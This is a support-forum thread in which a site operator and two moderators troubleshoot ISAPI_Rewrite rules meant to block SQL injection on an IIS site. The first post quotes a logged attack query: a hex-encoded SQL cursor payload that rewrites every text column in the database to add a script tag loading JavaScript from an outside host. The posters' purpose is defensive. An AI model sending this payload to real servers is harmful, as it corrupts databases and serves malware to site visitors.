Helicon Tech: SQL Injection - rules not working

ISAPI_Rewrite 3.0 support forum
Helicon Tech : ISAPI_Rewrite 3.0 support forum

Topic: SQL Injection - rules not working

Author

Message

<< Prev Topic | Next Topic >>

jgough
Newbie
Newbie

Joined: 22 September 2008
Location: Canada
Online Status: Offline
Posts: 3

Posted: 22 September 2008 at 4:51pm \| IP Logged

After reading all the post and doing a test with regextest i found that this rule passed the test

RewriteRule .*DECLARE.* /blog/index.cfm [I,F]

This is the example from my IIS Log file

/news/index.cfm type=1&newsID=3338;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS

But it is not catching anything at all according to the log file

And this is in the error.log file

[9/22/2008 14:35:49] ISAPI Filter loaded. Version 3.1.0.56. Windows 5.2 (Build 3790 ServicePack:2) ProductType SERVER. CPU type INTEL NumberOfProcessors 2.

Anton
Moderator Group

Joined: 30 January 2007
Location: Ukraine
Online Status: Offline
Posts: 4701

Posted: 23 September 2008 at 3:15am \| IP Logged

As far as I understand, you are using ISAPI_Rewrite3. Thus, your rules should be like:

RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
RewriteRule .? /blog/index.cfm? [NC,L]

__________________
Regards,
Anton

jgough
Newbie
Newbie

Joined: 22 September 2008
Location: Canada
Online Status: Offline
Posts: 3

Posted: 23 September 2008 at 9:55am \| IP Logged

I changed it to what you have suggested and still
nothing is getting caught in the rewrite log

Is there something wrong with how i entered it

RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]

or is there any other info I need to provide?

Vyacheslav
Moderator Group

Joined: 02 July 2008
Location: Ukraine
Online Status: Offline
Posts: 673

Posted: 23 September 2008 at 3:12pm \| IP Logged

Yep, please provide rewrite.log file.

__________________
Kind regards!
Vyacheslav Shinkarenko, HeliconTech.

jgough
Newbie
Newbie

Joined: 22 September 2008
Location: Canada
Online Status: Offline
Posts: 3

Posted: 23 September 2008 at 3:15pm \| IP Logged

The rewrite.log file is empty

Anton
Moderator Group

Joined: 30 January 2007
Location: Ukraine
Online Status: Offline
Posts: 4701

Posted: 25 September 2008 at 8:46am \| IP Logged

Please add the following directive into httpd.conf file to enable logging:

RewriteLogLevel 9

__________________
Regards,
Anton

If you wish to post a reply to this topic you must first login
If you are not already registered you must first register

Printable version

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot delete your posts in this forum
You cannot edit your posts in this forum
You cannot create polls in this forum
You can vote in polls in this forum